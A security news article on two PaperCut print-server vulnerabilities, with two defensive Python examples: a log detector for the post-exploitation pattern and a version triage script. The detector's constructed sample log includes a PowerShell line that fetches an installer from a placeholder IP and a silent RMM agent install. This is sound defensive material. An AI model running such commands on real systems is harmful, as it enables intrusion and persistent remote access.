The print management software firm PaperCut has recently alerted users about two severe vulnerabilities that allow remote attacks. US CISA has also confirmed active exploitation for one of these vulnerabilities.
CISA Alerts About PaperCut MF/NG Vulnerabilities
PaperCut has issued an emergency update for its users, rolling out patches for two severe vulnerabilities in PaperCut MF and NG; the fixed releases are 20.1.7, 21.2.11 and 22.0.9, and older branches have no patched build and must be upgraded.
In its advisory, PaperCut disclosed two distinct vulnerabilities affecting its print management software. Alongside the descriptions of the flaws, the firm confirmed that one of them is being actively exploited, based on reports it received from Trend Micro.
The first flaw is a remote code execution vulnerability (CVE-2023-27350) that lets an unauthenticated remote attacker run code on the PaperCut Application Server. It received a critical severity rating with a CVSS score of 9.8. PaperCut has withheld technical details of this vulnerability precisely because it confirmed active exploitation based on the Trend Micro reports.
The second issue (CVE-2023-27351) also allows an unauthenticated remote adversary to steal sensitive information stored in PaperCut MF or NG, including usernames, email addresses, full names, card numbers, and users' department or office details. This vulnerability received a high-severity rating with a CVSS score of 8.2. PaperCut reported no evidence of this flaw being exploited before the patch was released.
Following this emergency disclosure, the cybersecurity firm Huntress shared a detailed analysis of the attacks exploiting the RCE flaw.
According to its report, around 1,800 PaperCut servers were exposed to the internet and vulnerable at the time. Attackers abused the flaw to install RMM tools such as Atera and Syncro on the compromised servers for persistent access. Huntress also shared a proof-of-concept (PoC) demonstration of the flaw.
While the exact identity of the threat actors exploiting this vulnerability remains unknown, Huntress researchers suspect Russian threat actors. Briefly, although no direct link has been established, they found Truebot malware associated with this activity, and Truebot has previously been tied to the Cl0p ransomware operation and the Silence group.
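The post-exploitation pattern described above, a print server process launching a shell that fetches an RMM installer, is what a defender can hunt for while patches roll out. The following is an added example, not code from the page or from Huntress, that scans constructed Sysmon-style process-creation records (Event ID 1, one JSON object per line). It assumes the PaperCut Application Server runs as `pc-app.exe` on Windows, and that the process and marker names below are reasonable heuristics, not the only ones an attacker might use.

```python
"""Flag a PaperCut Application Server process spawning a shell, and any RMM installer.

Added example with constructed log lines; not the page's or Huntress's code.
"""
import json
from typing import List, Optional, Tuple

# Assumption (not stated on the page): the PaperCut app server is pc-app.exe on Windows.
PARENT = "pc-app.exe"
# A print server has no legitimate reason to launch these from its own process.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                       "rundll32.exe", "wscript.exe", "cscript.exe"}
# Command-line markers for the RMM tools named in the Huntress report.
RMM_MARKERS = ("atera", "syncro")

# Constructed sample records (Sysmon Event ID 1 fields, JSON per line).
SAMPLE_LOG = r"""
{"EventID":1,"Image":"C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe","ParentImage":"C:\\Windows\\System32\\services.exe","CommandLine":"pc-app.exe -service"}
{"EventID":1,"Image":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe","CommandLine":"cmd.exe /c powershell -ep bypass -c iwr http://203.0.113.9/setup.msi -o C:\\Windows\\Temp\\a.msi"}
{"EventID":1,"Image":"C:\\Windows\\System32\\msiexec.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","CommandLine":"msiexec /i C:\\Windows\\Temp\\AteraAgent.msi /qn"}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe"}
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a verdict label for one process-creation event, or None if benign."""
    if event.get("EventID") != 1:
        return None
    child = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "").lower()
    # High-confidence: the PaperCut service itself spawned a shell/script host.
    if parent == PARENT and child in SUSPICIOUS_CHILDREN:
        return "papercut_spawned_shell"
    # Lower-confidence: something referenced an RMM agent installer on the command line.
    if any(marker in cmdline for marker in RMM_MARKERS):
        return "rmm_installer"
    return None


def scan(log_text: str) -> List[Tuple[str, str]]:
    """Run classify() over newline-delimited JSON and collect (verdict, image) pairs."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        verdict = classify(event)
        if verdict:
            findings.append((verdict, basename(event.get("Image", ""))))
    return findings


if __name__ == "__main__":
    for verdict, image in scan(SAMPLE_LOG):
        print(f"{verdict:24s} {image}")
```

The first rule is the one worth paging on: a parent/child pair that should never occur on a print server. The second rule is noisier (an administrator may legitimately deploy an RMM agent), so it is best used to corroborate the first rather than alert on its own.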
CISA Also Alerts About PaperCut Flaws
The US CISA has also added the under-attack vulnerability CVE-2023-27350 to its Known Exploited Vulnerabilities catalog.
While PaperCut urges customers to deploy the updates, it also advised precautionary measures for systems where an immediate update is not possible. These mitigations include blocking inbound traffic from external IPs to the web management ports 9191 and 9192, blocking all inbound traffic to the web management portal at the firewall in front of the server (which also prevents lateral movement from other internal hosts, at the cost of managing the server only locally), and applying an allow list of IP addresses permitted to reach the portal.
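Deciding which servers in an estate still need the update comes down to comparing each one's version against the fixed builds, which is branch-specific rather than a single threshold. The following is an added example, not PaperCut's code, that encodes the fixed versions 20.1.7, 21.2.11 and 22.0.9 and triages a constructed inventory. Two assumptions are labelled in the code: branches older than 20.x are treated as having no patched build, and 23.x and later are treated as released after the fix.

```python
"""Triage PaperCut MF/NG versions against the CVE-2023-27350/27351 fixed builds.

Added example, not PaperCut's own tooling; the inventory below is constructed.
"""
import re
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# Fixed builds from PaperCut's advisory, keyed by major version branch.
FIXED: Dict[int, Version] = {20: (20, 1, 7), 21: (21, 2, 11), 22: (22, 0, 9)}
# Assumption for this example: 23.x and later shipped after the fix.
FIRST_CLEAN_MAJOR = 23

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Version]:
    """Extract major.minor.patch from a bare version or an 'About' banner string."""
    match = _VERSION_RE.search(text)
    if not match:
        return None
    major, minor, patch = (int(x) for x in match.groups())
    return (major, minor, patch)


def is_patched(text: str) -> bool:
    """True if the version carries the fix for CVE-2023-27350 and CVE-2023-27351."""
    version = parse_version(text)
    if version is None:
        raise ValueError(f"no version number found in {text!r}")
    major = version[0]
    if major >= FIRST_CLEAN_MAJOR:
        return True
    fixed = FIXED.get(major)
    if fixed is None:
        # Assumption: branches before 20.x have no patched build; they must upgrade.
        return False
    return version >= fixed


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host -> 'patched' or 'VULNERABLE' for a {host: version_string} inventory."""
    return {host: ("patched" if is_patched(ver) else "VULNERABLE")
            for host, ver in inventory.items()}


# Constructed inventory of hypothetical hosts.
SAMPLE_INVENTORY = {
    "print01": "PaperCut MF 22.0.8 (build 65234)",
    "print02": "PaperCut NG 22.0.9 (build 65456)",
    "print03": "21.2.11",
    "print04": "20.1.6",
    "print05": "19.2.3",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {status}")
```

Hosts reported as VULNERABLE are the ones that should be behind the firewall rules and allow list described above until they are upgraded.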
Let us know your thoughts in the comments.